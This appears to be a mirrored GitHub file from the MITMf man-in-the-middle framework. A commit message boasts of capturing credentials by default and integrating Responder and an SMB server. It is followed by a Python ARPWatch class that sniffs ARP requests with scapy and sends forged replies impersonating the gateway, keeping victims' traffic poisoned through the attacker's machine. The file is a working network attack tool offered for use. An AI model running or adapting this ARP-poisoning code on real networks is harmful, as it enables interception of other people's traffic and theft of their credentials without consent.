mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-05 20:42:20 -07:00
9712eed4a3
I've re-written a decent amount of the framework to support dynamic config file updates, revamped the ARP Spoofing 'engine' and changed the way MITMf integrates Responder and Netcreds. - Net-creds is now started by default and no longer a plugin.. It's all about getting those creds after all. - Integrated the Subterfuge Framework's ARPWatch script, it will enable itself when spoofing the whole subnet (also squashed bugs in the original ARP spoofing code) - The spoof plugin now supports specifying a range of targets (e.g. --target 10.10.10.1-15) and multiple targets (e.g. --target 10.10.10.1,10.10.10.2) - An SMB Server is now started by default, MITMf now uses Impacket's SMBserver as supposed to the one built into Responder, mainly for 2 reasons: 1) Impacket is moving towards SMB2 support and is actively developed 2) Impacket's SMB server is fully functional as supposed to Responder's (will be adding a section for it in the config file) 3) Responder's SMB server was unrealiable when used through MITMf (After spending a day trying to figure out why, I just gave up and yanked it out) - Responder's code has been broken down into single importable classes (way easier to manage and read, ugh!) - Started adding dynamic config support to Responder's code and changed the logging messages to be a bit more readable. - POST data captured through the proxy will now only be logged and printed to STDOUT when it's decodable to UTF-8 (this prevents logging encrypted data which is no use) - Responder and the Beefapi script are no longer submodules (they seem to be a pain to package, so i removed them to help a brother out) - Some plugins are missing because I'm currently re-writing them, will be added later - Main plugin class now inharates from the ConfigWatcher class, this way plugins will support dynamic configs natively! \o/
86 lines
3.8 KiB
Python
86 lines
3.8 KiB
Python
import logging
|
|
import os
|
|
import sys
|
|
import threading
|
|
|
|
from scapy.all import *
|
|
|
|
mitmf_logger = logging.getLogger('mitmf')
|
|
|
|
class ARPWatch:
|
|
|
|
def __init__(self, gatewayip, myip, interface):
|
|
self.gatewayip = gatewayip
|
|
self.gatewaymac = None
|
|
self.myip = myip
|
|
self.interface = interface
|
|
self.debug = False
|
|
self.watch = True
|
|
|
|
def start(self):
|
|
try:
|
|
self.gatewaymac = getmacbyip(self.gatewayip)
|
|
if self.gatewaymac is None:
|
|
sys.exit("[ARPWatch] Error: Could not resolve gateway's MAC address")
|
|
except Exception, e:
|
|
sys.exit("[ARPWatch] Exception occured while resolving gateway's MAC address: {}".format(e))
|
|
|
|
mitmf_logger.debug("[ARPWatch] gatewayip => {}".format(self.gatewayip))
|
|
mitmf_logger.debug("[ARPWatch] gatewaymac => {}".format(self.gatewaymac))
|
|
mitmf_logger.debug("[ARPWatch] myip => {}".format(self.myip))
|
|
mitmf_logger.debug("[ARPWatch] interface => {}".format(self.interface))
|
|
|
|
t = threading.Thread(name='ARPWatch', target=self.startARPWatch)
|
|
t.setDaemon(True)
|
|
t.start()
|
|
|
|
def stop(self):
|
|
mitmf_logger.debug("[ARPWatch] shutting down")
|
|
self.watch = False
|
|
|
|
def startARPWatch(self):
|
|
sniff(prn=self.arp_monitor_callback, filter="arp", store=0)
|
|
|
|
def arp_monitor_callback(self, pkt):
|
|
if self.watch is True: #Prevents sending packets on exiting
|
|
if ARP in pkt and pkt[ARP].op == 1: #who-has only
|
|
#broadcast mac is 00:00:00:00:00:00
|
|
packet = None
|
|
#print str(pkt[ARP].hwsrc) #mac of sender
|
|
#print str(pkt[ARP].psrc) #ip of sender
|
|
#print str(pkt[ARP].hwdst) #mac of destination (often broadcst)
|
|
#print str(pkt[ARP].pdst) #ip of destination (Who is ...?)
|
|
|
|
if (str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and str(pkt[ARP].pdst) == self.gatewayip and self.myip != str(pkt[ARP].psrc)):
|
|
mitmf_logger.debug("[ARPWatch] {} is asking where the Gateway is. Sending reply: I'm the gateway biatch!'".format(pkt[ARP].psrc))
|
|
#send repoison packet
|
|
packet = ARP()
|
|
packet.op = 2
|
|
packet.psrc = self.gatewayip
|
|
packet.hwdst = str(pkt[ARP].hwsrc)
|
|
packet.pdst = str(pkt[ARP].psrc)
|
|
|
|
elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip != str(pkt[ARP].pdst)):
|
|
mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: I'm {} biatch!".format(pkt[ARP].pdst, pkt[ARP].pdst))
|
|
#send repoison packet
|
|
packet = ARP()
|
|
packet.op = 2
|
|
packet.psrc = self.gatewayip
|
|
packet.hwdst = '00:00:00:00:00:00'
|
|
packet.pdst = str(pkt[ARP].pdst)
|
|
|
|
elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip == str(pkt[ARP].pdst)):
|
|
mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: This is the h4xx0r box!".format(pkt[ARP].pdst))
|
|
|
|
packet = ARP()
|
|
packet.op = 2
|
|
packet.psrc = self.myip
|
|
packet.hwdst = str(pkt[ARP].hwsrc)
|
|
packet.pdst = str(pkt[ARP].psrc)
|
|
|
|
try:
|
|
if packet is not None:
|
|
send(packet, verbose=self.debug, iface=self.interface)
|
|
except Exception, e:
|
|
mitmf_logger.error("[ARPWatch] Error sending re-poison packet: {}".format(e))
|
|
pass
|